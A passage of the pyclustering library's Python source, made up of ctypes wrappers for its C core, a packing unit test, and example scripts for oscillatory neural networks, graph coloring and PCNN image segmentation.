ccore = ccore_library.get()
ccore.som_get_size.restype = c_size_t
return ccore.som_get_size(som_pointer)
def som_get_capture_objects(som_pointer):
"""!
@brief Returns list of indexes of captured objects by each neuron.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_capture_objects.restype = POINTER(pyclustering_package)
package = ccore.som_get_capture_objects(som_pointer)
result = package_extractor(package).extract()
return result
def som_get_weights(som_pointer):
"""!
@brief Returns list of weights of each neuron.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_weights.restype = POINTER(pyclustering_package)
package = ccore.som_get_weights(som_pointer)
result = package_extractor(package).extract()
return result
def som_get_awards(som_pointer):
"""!
@brief Returns list of amount of captured objects by each neuron.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_awards.restype = POINTER(pyclustering_package)
package = ccore.som_get_awards(som_pointer)
result = package_extractor(package).extract()
return result
def som_get_neighbors(som_pointer):
"""!
@brief Returns list of indexes of neighbors of each neuron.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_neighbors.restype = POINTER(pyclustering_package)
package = ccore.som_get_neighbors(som_pointer)
result = package_extractor(package).extract()
return result
```
#### File: pyclustering/core/sync_wrapper.py
```python
from pyclustering.core.wrapper import *
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor
def sync_create_network(num_osc, weight, frequency, type_conn, initial_phases):
ccore = ccore_library.get()
ccore.sync_create_network.restype = POINTER(c_void_p)
pointer_network = ccore.sync_create_network(c_uint(num_osc), c_double(weight), c_double(frequency), c_uint(type_conn), c_uint(initial_phases))
return pointer_network
def sync_get_size(pointer_network):
ccore = ccore_library.get()
ccore.sync_get_size.restype = c_size_t
return ccore.sync_get_size(pointer_network)
def sync_destroy_network(pointer_network):
ccore = ccore_library.get()
ccore.sync_destroy_network(pointer_network)
def sync_simulate_static(pointer_network, steps, time, solution, collect_dynamic):
ccore = ccore_library.get()
ccore.sync_simulate_static.restype = POINTER(c_void_p)
return ccore.sync_simulate_static(pointer_network, c_uint(steps), c_double(time), c_uint(solution), c_bool(collect_dynamic))
def sync_simulate_dynamic(pointer_network, order, solution, collect_dynamic, step, int_step, threshold_changes):
ccore = ccore_library.get()
ccore.sync_simulate_dynamic.restype = POINTER(c_void_p)
return ccore.sync_simulate_dynamic(pointer_network, c_double(order), c_uint(solution), c_bool(collect_dynamic), c_double(step), c_double(int_step), c_double(threshold_changes))
def sync_order(pointer_network):
ccore = ccore_library.get()
ccore.sync_order.restype = c_double
return ccore.sync_order(pointer_network)
def sync_local_order(pointer_network):
ccore = ccore_library.get()
ccore.sync_local_order.restype = c_double
return ccore.sync_local_order(pointer_network)
def sync_connectivity_matrix(pointer_network):
ccore = ccore_library.get()
ccore.sync_connectivity_matrix.restype = POINTER(pyclustering_package)
package = ccore.sync_connectivity_matrix(pointer_network)
connectivity_matrix = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return connectivity_matrix
def sync_dynamic_get_size(pointer_dynamic):
ccore = ccore_library.get()
ccore.sync_dynamic_get_time.restype = c_size_t
return ccore.sync_dynamic_get_size(pointer_dynamic)
def sync_dynamic_destroy(pointer_dynamic):
ccore = ccore_library.get()
ccore.sync_dynamic_destroy(pointer_dynamic)
def sync_dynamic_allocate_sync_ensembles(pointer_dynamic, tolerance, iteration):
if iteration is None:
iteration = sync_dynamic_get_size(pointer_dynamic) - 1
ccore = ccore_library.get()
ccore.sync_dynamic_allocate_sync_ensembles.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_allocate_sync_ensembles(pointer_dynamic, c_double(tolerance), c_size_t(iteration))
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_allocate_correlation_matrix(pointer_dynamic, iteration):
analyse_iteration = iteration
if analyse_iteration is None:
analyse_iteration = sync_dynamic_get_size(pointer_dynamic) - 1
ccore = ccore_library.get()
ccore.sync_dynamic_allocate_correlation_matrix.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_allocate_correlation_matrix(pointer_dynamic, c_uint(analyse_iteration))
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_get_output(pointer_dynamic):
ccore = ccore_library.get()
ccore.sync_dynamic_get_output.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_get_output(pointer_dynamic)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_get_time(pointer_dynamic):
ccore = ccore_library.get()
ccore.sync_dynamic_get_time.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_get_time(pointer_dynamic)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_calculate_order(pointer_dynamic, start_iteration, stop_iteration):
ccore = ccore_library.get()
ccore.sync_dynamic_calculate_order.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_calculate_order(pointer_dynamic, start_iteration, stop_iteration)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def sync_dynamic_calculate_local_order(pointer_dynamic, pointer_network, start_iteration, stop_iteration):
ccore = ccore_library.get()
ccore.sync_dynamic_calculate_local_order.restype = POINTER(pyclustering_package)
package = ccore.sync_dynamic_calculate_local_order(pointer_dynamic, pointer_network, c_size_t(start_iteration), c_size_t(stop_iteration))
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
```
#### File: core/tests/ut_package.py
```python
import unittest
import numpy
from pyclustering.core.pyclustering_package import package_builder, package_extractor
from ctypes import c_ulong, c_size_t, c_double, c_uint, c_float, c_char_p
class Test(unittest.TestCase):
def templatePackUnpack(self, dataset, c_type_data=None):
package_pointer = package_builder(dataset, c_type_data).create()
unpacked_package = package_extractor(package_pointer).extract()
packing_data = dataset
if isinstance(packing_data, numpy.ndarray):
packing_data = dataset.tolist()
if isinstance(packing_data, str):
self.assertEqual(dataset, unpacked_package)
else:
self.assertTrue(self.compare_containers(packing_data, unpacked_package))
def compare_containers(self, container1, container2):
def is_container(container):
return isinstance(container, list) or isinstance(container, tuple)
if len(container1) == 0 and len(container2) == 0:
return True
if len(container1) != len(container2):
return False
for index in range(len(container1)):
if is_container(container1[index]) and is_container(container2[index]):
return self.compare_containers(container1[index], container2[index])
elif is_container(container1[index]) == is_container(container2[index]):
if container1[index] != container2[index]:
return False
else:
return False
return True
def testListInteger(self):
self.templatePackUnpack([1, 2, 3, 4, 5])
def testListIntegerSingle(self):
self.templatePackUnpack([2])
def testListIntegerNegative(self):
self.templatePackUnpack([-1, -2, -10, -20])
def testListIntegerNegativeAndPositive(self):
self.templatePackUnpack([-1, 26, -10, -20, 13])
def testListFloat(self):
self.templatePackUnpack([1.1, 1.2, 1.3, 1.4, 1.5, 1.6])
def testListFloatNegativeAndPositive(self):
self.templatePackUnpack([1.1, -1.2, -1.3, -1.4, 1.5, -1.6])
def testListLong(self):
self.templatePackUnpack([100000000, 2000000000])
def testListEmpty(self):
self.templatePackUnpack([])
def testListOfListInteger(self):
self.templatePackUnpack([ [1, 2, 3], [4, 5, 6], [7, 8, 9] ])
def testListOfListDouble(self):
self.templatePackUnpack([ [1.1, 5.4], [1.3], [1.4, -9.4] ])
def testListOfListWithGaps(self):
self.templatePackUnpack([ [], [1, 2, 3], [], [4], [], [5, 6, 7] ])
def testListSpecifyUnsignedLong(self):
self.templatePackUnpack([1, 2, 3, 4, 5], c_ulong)
def testListSpecifyUnsignedSizeT(self):
self.templatePackUnpack([1, 2, 3, 4, 5], c_size_t)
def testListSpecifyDouble(self):
self.templatePackUnpack([1.1, 1.6, -7.8], c_double)
def testListOfListSpecifySizeT(self):
self.templatePackUnpack([ [1, 2, 3], [4, 5] ], c_size_t)
def testListOfListSpecifyUnsignedIntWithGaps(self):
self.templatePackUnpack([ [1, 2, 3], [], [4, 5], [], [] ], c_uint)
def testListOfListEmpty(self):
self.templatePackUnpack([ [], [], [] ])
def testListOfListOfListInteger(self):
self.templatePackUnpack([ [ [1], [2] ], [ [3], [4] ], [ [5, 6], [7, 8] ] ])
def testTupleInterger(self):
self.templatePackUnpack([ (1, 2, 3), (4, 5), (6, 7, 8, 9) ], c_uint)
def testTupleFloat(self):
self.templatePackUnpack([ (1.0, 2.0, 3.8), (4.6, 5.0), (6.8, 7.4, 8.5, 9.6) ], c_float)
def testTupleEmpty(self):
self.templatePackUnpack([(), (), ()])
def testNumpyMatrixOneColumn(self):
self.templatePackUnpack(numpy.array([[1.0], [2.0], [3.0]]), c_double)
def testNumpyMatrixTwoColumns(self):
self.templatePackUnpack(numpy.array([[1.0, 1.0], [2.0, 2.0]]), c_double)
def testNumpyMatrixThreeColumns(self):
self.templatePackUnpack(numpy.array([[1.1, 2.2, 3.3], [2.2, 3.3, 4.4], [3.3, 4.4, 5.5]]), c_double)
def testString(self):
self.templatePackUnpack("Test message number one".encode('utf-8'))
def testEmptyString(self):
self.templatePackUnpack("".encode('utf-8'))
```
#### File: pyclustering/core/ttsas_wrapper.py
```python
from ctypes import c_double, POINTER;
from pyclustering.core.wrapper import ccore_library;
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder;
def ttsas(sample, threshold1, threshold2, metric_pointer):
pointer_data = package_builder(sample, c_double).create();
ccore = ccore_library.get();
ccore.ttsas_algorithm.restype = POINTER(pyclustering_package);
package = ccore.ttsas_algorithm(pointer_data, c_double(threshold1), c_double(threshold2), metric_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result[0], result[1];
```
#### File: pyclustering/core/xmeans_wrapper.py
```python
from ctypes import c_double, c_longlong, c_size_t, c_uint, POINTER
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder
def xmeans(sample, centers, kmax, tolerance, criterion, alpha, beta, repeat, random_state, metric_pointer):
random_state = random_state or -1
pointer_data = package_builder(sample, c_double).create()
pointer_centers = package_builder(centers, c_double).create()
ccore = ccore_library.get()
ccore.xmeans_algorithm.restype = POINTER(pyclustering_package)
package = ccore.xmeans_algorithm(pointer_data, pointer_centers, c_size_t(kmax), c_double(tolerance),
c_uint(criterion), c_double(alpha), c_double(beta), c_size_t(repeat),
c_longlong(random_state), metric_pointer)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
```
#### File: gcolor/examples/hysteresis_examples.py
```python
from pyclustering.gcolor.hysteresis import hysteresisgcolor;
from pyclustering.utils.graph import read_graph, draw_graph;
from pyclustering.utils import draw_dynamics;
from pyclustering.samples.definitions import GRAPH_SIMPLE_SAMPLES;
def template_graph_coloring(filename, alpha, eps, steps, time, title = None, tolerance = 0.1, threshold_steps = 10):
if (title is None): title = filename;
graph = read_graph(filename);
network = hysteresisgcolor(graph.data, alpha, eps);
output_dynamic = network.simulate(steps, time);
draw_dynamics(output_dynamic.time, output_dynamic.output, x_title = "Time", y_title = "State");
clusters = output_dynamic.allocate_clusters(tolerance, threshold_steps);
for index in range(0, len(clusters)):
print("Color #", index, ": ", clusters[index]);
coloring_map = output_dynamic.allocate_map_coloring(tolerance, threshold_steps);
draw_graph(graph, coloring_map);
def graph_simple1():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_SIMPLE1, 1.2, 1.8, 2000, 20);
def graph_one_line():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_LINE, 1.2, 1.8, 2000, 20);
def graph_one_crossroad():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CROSSROAD, 1.2, 1.8, 2000, 20);
def graph_two_crossroads():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_TWO_CROSSROADS, 1.2, 1.8, 2000, 20);
def graph_full_interconnected1():
"Bad result - two vertices colored by the same color"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_FULL1, 1.2, 1.8, 2000, 20, tolerance = 0.05);
def graph_full_interconnected2():
"Good result - optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_FULL2, 1.2, 1.8, 2000, 20, tolerance = 0.05);
def graph_one_circle1():
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CIRCLE1, 1.1, 1.1, 2000, 20);
def graph_one_circle2():
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CIRCLE2, 1.1, 1.1, 2000, 20);
def graph_one_circle3():
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CIRCLE3, 1.1, 1.1, 2000, 20);
def graph_five_pointed_frame_star():
"Good result - not optimal"
template_graph_coloring(GRAPH_SIMPLE_SAMPLES.GRAPH_FIVE_POINTED_FRAME_STAR, 1.1, 1.4, 3000, 30);
graph_simple1();
graph_one_line();
graph_one_crossroad();
graph_two_crossroads();
graph_full_interconnected1();
graph_full_interconnected2();
graph_one_circle1();
graph_one_circle2();
graph_one_circle3();
graph_five_pointed_frame_star();
```
#### File: gcolor/tests/ut_hysteresis.py
```python
import unittest;
from pyclustering.gcolor.hysteresis import hysteresisgcolor;
from pyclustering.utils.graph import read_graph;
from pyclustering.samples.definitions import GRAPH_SIMPLE_SAMPLES;
class Test(unittest.TestCase):
def templateTestColoring(self, filename, alpha, eps, steps, time):
graph = read_graph(filename);
network = hysteresisgcolor(graph.data, alpha, eps);
output_analyser = network.process(steps, time);
map_coloring = output_analyser.allocate_map_coloring(0.05, 20);
# Check number of colors
assigned_colors = set(map_coloring);
# Check validity of color numbers
for color_number in range(0, len(assigned_colors), 1):
assert color_number in assigned_colors;
# Check validity of colors
for index_node in range(len(graph.data)):
color_neighbors = [ map_coloring[index] for index in range(len(graph.data[index_node])) if graph.data[index_node][index] != 0 and index_node != index];
#print(index_node, map_coloring[index_node], color_neighbors, assigned_colors, map_coloring, "\n\n");
assert map_coloring[index_node] not in color_neighbors;
def testColoringSimple1(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_SIMPLE1, 1.2, 1.8, 1500, 15);
def testColoringCircle2(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CIRCLE2, 1.1, 1.1, 1500, 15);
def testColoringFivePointedFrameStar(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_FIVE_POINTED_FRAME_STAR, 1, 1, 2500, 25);
def testColoringOneLine(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_LINE, 1.2, 1.8, 1500, 15);
def testColoringOneCrossroad(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_ONE_CROSSROAD, 1.2, 1.8, 1500, 15);
def testColoringTwoCrossroads(self):
self.templateTestColoring(GRAPH_SIMPLE_SAMPLES.GRAPH_TWO_CROSSROADS, 1.2, 1.8, 1500, 15);
```
#### File: nnet/examples/hhn_examples.py
```python
from pyclustering.nnet.dynamic_visualizer import dynamic_visualizer
from pyclustering.nnet.hhn import hhn_network, hhn_parameters
def template_dynamic_hhn(num_osc, steps, time, stimulus=None, params=None, separate=False, ccore_flag=False):
net = hhn_network(num_osc, stimulus, params, ccore=ccore_flag)
(t, dyn_peripheral, dyn_central) = net.simulate(steps, time)
amount_canvases = 1
if (isinstance(separate, list)):
amount_canvases = len(separate) + 2
elif (separate is True):
amount_canvases = len(dyn_peripheral[0]) + 2
visualizer = dynamic_visualizer(amount_canvases, x_title="Time", y_title="V", y_labels=False)
visualizer.append_dynamics(t, dyn_peripheral, 0, separate)
visualizer.append_dynamics(t, dyn_central, amount_canvases - 2, True)
visualizer.show()
def one_oscillator_unstimulated():
template_dynamic_hhn(1, 750, 100, separate=True, ccore_flag=False)
template_dynamic_hhn(1, 750, 100, separate=True, ccore_flag=True)
def one_oscillator_stimulated():
template_dynamic_hhn(1, 750, 100, [25], separate=True, ccore_flag=False)
template_dynamic_hhn(1, 750, 100, [25], separate=True, ccore_flag=True)
def three_oscillators_stimulated():
template_dynamic_hhn(3, 750, 100, [25] * 3, separate=True, ccore_flag=False)
template_dynamic_hhn(3, 750, 100, [25] * 3, separate=True, ccore_flag=True)
def two_sync_ensembles():
template_dynamic_hhn(4, 400, 200, [25, 25, 50, 50], separate=True, ccore_flag=False)
template_dynamic_hhn(4, 800, 200, [25, 25, 50, 50], separate=True, ccore_flag=True)
def ten_oscillators_stimulated_desync():
params = hhn_parameters()
params.w1 = 0
params.w2 = 0
params.w3 = 0
stumulus = [25, 25, 25, 25, 25, 11, 11, 11, 11, 11]
template_dynamic_hhn(10, 750, 100, stumulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(10, 750, 100, stumulus, params, separate=True, ccore_flag=True)
def ten_oscillators_stimulated_sync():
params = hhn_parameters()
params.w1 = 0.1
params.w2 = 0.0
params.w3 = 0
stumulus = [25, 25, 25, 25, 25, 27, 27, 27, 27, 27]
template_dynamic_hhn(10, 750, 100, stumulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(10, 750, 100, stumulus, params, separate=True, ccore_flag=True)
def ten_oscillators_stimulated_partial_sync():
params = hhn_parameters()
params.w1 = 0.1
params.w2 = 5.0
params.w3 = 0
stimulus = [25, 25, 25, 25, 25, 11, 11, 11, 11, 11]
template_dynamic_hhn(10, 750, 200, stimulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(10, 750, 200, stimulus, params, separate=True, ccore_flag=True)
def six_oscillators_mix_2_stimulated():
params = hhn_parameters()
params.deltah = 400
stimulus = [25, 25, 25, 47, 47, 47]
template_dynamic_hhn(6, 1200, 600, stimulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(6, 2400, 600, stimulus, params, separate=True, ccore_flag=True)
def six_oscillators_mix_3_stimulated():
params = hhn_parameters()
params.deltah = 400
stimulus = [0, 0, 25, 25, 47, 47]
template_dynamic_hhn(6, 1200, 600, stimulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(6, 2400, 600, stimulus, params, separate=True, ccore_flag=True)
def three_sync_ensembles():
params = hhn_parameters()
params.deltah = 400
stimulus = [25, 26, 25, 25, 26, 45, 46, 45, 44, 45, 65, 65, 65, 64, 66]
separate = [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9], [10, 11, 12, 13, 14]]
num_osc = len(stimulus)
template_dynamic_hhn(num_osc, 2400, 600, stimulus, params, separate=separate, ccore_flag=True)
def four_ensembles_80_oscillators():
params = hhn_parameters()
params.deltah = 650
params.w1 = 0.1
params.w2 = 9.0
params.w3 = 5.0
params.threshold = -10
expected_ensembles = []
stimulus = []
base_stimulus = 10
step_stimulus = 10
amount_ensebles = 4
region_size = 20
for i in range(amount_ensebles):
expected_ensembles += [ [i for i in range(region_size * i, region_size * i + region_size)] ]
stimulus += [ base_stimulus + step_stimulus * i ] * region_size
template_dynamic_hhn(len(stimulus), 4000, 1000, stimulus, params, separate=expected_ensembles, ccore_flag=True)
one_oscillator_unstimulated()
one_oscillator_stimulated()
three_oscillators_stimulated()
two_sync_ensembles()
ten_oscillators_stimulated_desync()
ten_oscillators_stimulated_sync()
ten_oscillators_stimulated_partial_sync()
six_oscillators_mix_2_stimulated()
six_oscillators_mix_3_stimulated()
three_sync_ensembles()
four_ensembles_80_oscillators()
```
#### File: nnet/examples/legion_examples.py
```python
from pyclustering.utils import draw_dynamics;
from pyclustering.nnet.legion import legion_network, legion_parameters;
from pyclustering.nnet import *;
def template_dynamic_legion(num_osc, steps, time, conn_type, stimulus, params = None, separate_repr = True, ccore_flag = True):
net = legion_network(num_osc, params, conn_type, ccore = ccore_flag);
print("Created");
dynamic = net.simulate(steps, time, stimulus, solution = solve_type.RK4);
print("Simulated");
draw_dynamics(dynamic.time, dynamic.output, x_title = "Time", y_title = "x(t)", separate = separate_repr);
draw_dynamics(dynamic.time, dynamic.inhibitor, x_title = "Time", y_title = "z(t)");
ensembles = dynamic.allocate_sync_ensembles(0.1);
print(ensembles);
def one_oscillator_unstimulated():
parameters = legion_parameters();
parameters.teta = 0; # because no neighbors at all
template_dynamic_legion(1, 2000, 500, conn_type.NONE, [0], parameters);
def one_oscillator_stimulated():
parameters = legion_parameters();
parameters.teta = 0; # because no neighbors at all
template_dynamic_legion(1, 2000, 500, conn_type.NONE, [1], parameters);
def three_oscillator_unstimulated_list():
parameters = legion_parameters();
parameters.teta = 0; # because no stmulated neighbors
template_dynamic_legion(3, 2000, 200, conn_type.LIST_BIDIR, [0, 0, 0], parameters);
def three_oscillator_stimulated_list():
template_dynamic_legion(3, 1500, 1500, conn_type = conn_type.LIST_BIDIR, stimulus = [1, 1, 1]);
def three_oscillator_mix_stimulated_list():
parameters = legion_parameters();
parameters.Wt = 4.0;
template_dynamic_legion(3, 1200, 1200, conn_type = conn_type.LIST_BIDIR, stimulus = [1, 0, 1], params = parameters);
def ten_oscillator_stimulated_list():
template_dynamic_legion(10, 1000, 750, conn_type = conn_type.LIST_BIDIR, stimulus = [1] * 10);
def ten_oscillator_mix_stimulated_list():
template_dynamic_legion(10, 1500, 1500, conn_type = conn_type.LIST_BIDIR, stimulus = [1, 1, 1, 0, 0, 0, 1, 1, 0, 0], separate_repr = [ [0, 1, 2], [3, 4, 5, 8, 9], [6, 7] ]);
def thirteen_oscillator_three_stimulated_ensembles_list():
"Good example of three synchronous ensembels"
"Not accurate due to false skipes are observed"
parameters = legion_parameters();
parameters.Wt = 4.0;
parameters.fi = 10.0;
template_dynamic_legion(15, 1000, 1000, conn_type = conn_type.LIST_BIDIR, stimulus = [1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1], params = parameters, separate_repr = [ [0, 1, 2], [3, 4, 5, 9, 10], [6, 7, 8], [11, 12, 13, 14] ]);
def thirteen_simplify_oscillator_three_stimulated_ensembles_list():
"Good example of three synchronous ensembels"
"Not accurate due to false skipes are observed"
parameters = legion_parameters();
parameters.Wt = 4.0;
parameters.fi = 0.8;
parameters.ENABLE_POTENTIONAL = False;
template_dynamic_legion(15, 1000, 1000, conn_type = conn_type.LIST_BIDIR,
stimulus = [1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1],
params = parameters,
separate_repr = [ [0, 1, 2], [3, 4, 5, 9, 10], [6, 7, 8], [11, 12, 13, 14] ]);
def sixteen_oscillator_two_stimulated_ensembles_grid():
"Not accurate false due to spikes are observed"
parameters = legion_parameters();
parameters.teta_x = -1.1;
template_dynamic_legion(16, 2000, 1500, conn_type = conn_type.GRID_FOUR, params = parameters, stimulus = [1, 1, 1, 0,
1, 1, 1, 0,
0, 0, 0, 1,
0, 0, 1, 1]);
def simple_segmentation_example():
"Perfect results!"
parameters = legion_parameters();
parameters.eps = 0.02;
parameters.alpha = 0.005;
parameters.betta = 0.1;
parameters.gamma = 7.0;
parameters.teta = 0.9;
parameters.lamda = 0.1;
parameters.teta_x = -0.5;
parameters.teta_p = 7.0;
parameters.Wz = 0.7;
parameters.mu = 0.01;
parameters.fi = 3.0;
parameters.teta_xz = 0.1;
parameters.teta_zx = 0.1;
parameters.ENABLE_POTENTIONAL = False;
template_dynamic_legion(81, 2500, 2500,
conn_type = conn_type.GRID_FOUR,
params = parameters,
stimulus = [1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 1, 0, 0, 1, 1, 1, 1,
1, 1, 1, 0, 0, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0, 1, 1, 1,
0, 0, 0, 0, 0, 0, 1, 1, 1,
1, 1, 1, 1, 0, 0, 1, 1, 1,
1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 0, 0, 0, 0, 0],
separate_repr = [ [0, 1, 2, 9, 10, 11, 18, 19, 20],
[14, 15, 16, 17, 23, 24, 25, 26, 33, 34, 35, 42, 43, 44, 51, 52, 53],
[45, 46, 47, 48, 54, 55, 56, 57, 63, 64, 65, 66, 72, 73, 74, 75] ]);
one_oscillator_unstimulated();
one_oscillator_stimulated();
three_oscillator_unstimulated_list();
three_oscillator_stimulated_list();
three_oscillator_mix_stimulated_list();
ten_oscillator_stimulated_list();
ten_oscillator_mix_stimulated_list();
thirteen_oscillator_three_stimulated_ensembles_list();
thirteen_simplify_oscillator_three_stimulated_ensembles_list();
sixteen_oscillator_two_stimulated_ensembles_grid();
simple_segmentation_example();
```
#### File: nnet/examples/pcnn_segmentation.py
```python
from PIL import Image
from pyclustering.utils import read_image, rgb2gray, draw_image_mask_segments
from pyclustering.nnet.pcnn import pcnn_network, pcnn_parameters, pcnn_visualizer
from pyclustering.nnet import *
from pyclustering.samples.definitions import IMAGE_SIMPLE_SAMPLES, IMAGE_MAP_SAMPLES, IMAGE_REAL_SAMPLES
def template_segmentation_image(image, parameters, simulation_time, brightness, scale_color=True, fastlinking=False,
show_spikes=False, ccore_flag=True):
image_source = Image.open(image)
image_size = image_source.size
width = image_size[0]
height = image_size[1]
stimulus = read_image(image)
stimulus = rgb2gray(stimulus)
if brightness is not None:
for pixel_index in range(len(stimulus)):
if stimulus[pixel_index] < brightness:
stimulus[pixel_index] = 1
else:
stimulus[pixel_index] = 0
else:
maximum_stimulus = float(max(stimulus))
minimum_stimulus = float(min(stimulus))
delta = maximum_stimulus - minimum_stimulus
for pixel_index in range(len(stimulus)):
if scale_color is True:
stimulus[pixel_index] = 1.0 - ((float(stimulus[pixel_index]) - minimum_stimulus) / delta)
else:
stimulus[pixel_index] = float(stimulus[pixel_index]) / 255
if parameters is None:
parameters = pcnn_parameters()
parameters.AF = 0.1
parameters.AL = 0.1
parameters.AT = 0.8
parameters.VF = 1.0
parameters.VL = 1.0
parameters.VT = 30.0
parameters.W = 1.0
parameters.M = 1.0
parameters.FAST_LINKING = fastlinking
net = pcnn_network(len(stimulus), parameters, conn_type.GRID_EIGHT, height=height, width=width, ccore=ccore_flag)
output_dynamic = net.simulate(simulation_time, stimulus)
pcnn_visualizer.show_output_dynamic(output_dynamic)
ensembles = output_dynamic.allocate_sync_ensembles()
draw_image_mask_segments(image, ensembles)
pcnn_visualizer.show_time_signal(output_dynamic)
if show_spikes is True:
spikes = output_dynamic.allocate_spike_ensembles()
draw_image_mask_segments(image, spikes)
pcnn_visualizer.animate_spike_ensembles(output_dynamic, image_size)
def segmentation_image_simple1():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE01, None, 47, 235)
def segmentation_image_simple2():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE02, None, 47, 235)
def segmentation_image_simple6():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE06, None, 47, 128)
def segmentation_image_black_thin_lines1():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_THIN_BLACK_LINES01, None, 47, 128)
def segmentation_image_black_thin_lines2():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_THIN_BLACK_LINES02, None, 47, 128)
def segmentation_image_black_thin_lines3():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_THIN_BLACK_LINES03, None, 47, 128)
def segmentation_gray_image_simple1():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE01, None, 47, None, True, False, True)
def segmentation_gray_image_simple5():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE05, None, 47, None, True, False, True)
def segmentation_gray_image_beach():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BEACH, None, 94, None, True, False, True)
def segmentation_gray_image_building():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BUILDING, None, 47, None, True, False, True)
def segmentation_fast_linking_image_beach():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BEACH, None, 47, None, False, True, True)
def segmentation_fast_linking_image_building():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BUILDING, None, 47, None, False, True, True)
def segmentation_fast_linking_image_fruits():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_FRUITS_SMALL, None, 47, None, False, True, True)
def segmentation_fast_linking_white_sea():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_WHITE_SEA_SMALL, None, 47, None, False, True, True)
def segmentation_fast_linking_nil():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_NILE_SMALL, None, 47, None, False, True, True)
def segmentation_fast_linking_field_flowers():
parameters = pcnn_parameters()
parameters.AF = 0.1
parameters.AL = 0.1
parameters.AT = 0.8
parameters.VF = 1.0
parameters.VL = 1.0
parameters.VT = 80.0
parameters.W = 1.0
parameters.M = 1.0
parameters.FAST_LINKING = True
template_segmentation_image(IMAGE_REAL_SAMPLES.IMAGE_FIELD_FLOWER, parameters, 80, None, False, True, True)
# Examples of simple image segmentation
segmentation_image_simple1()
segmentation_image_simple2()
segmentation_image_simple6()
# Line allocation
segmentation_image_black_thin_lines1()
segmentation_image_black_thin_lines2()
segmentation_image_black_thin_lines3()
# More complex image segmentation examples
segmentation_gray_image_simple1()
segmentation_gray_image_simple5()
segmentation_gray_image_beach()
segmentation_gray_image_building()
# Fast linking usage examples
segmentation_fast_linking_image_beach()
segmentation_fast_linking_image_building()
segmentation_fast_linking_image_fruits()
segmentation_fast_linking_white_sea()
segmentation_fast_linking_nil()
segmentation_fast_linking_field_flowers()
```
#### File: nnet/examples/som_recognition.py
```python
from pyclustering.nnet.som import som, type_conn;
from pyclustering.samples.definitions import IMAGE_DIGIT_SAMPLES;
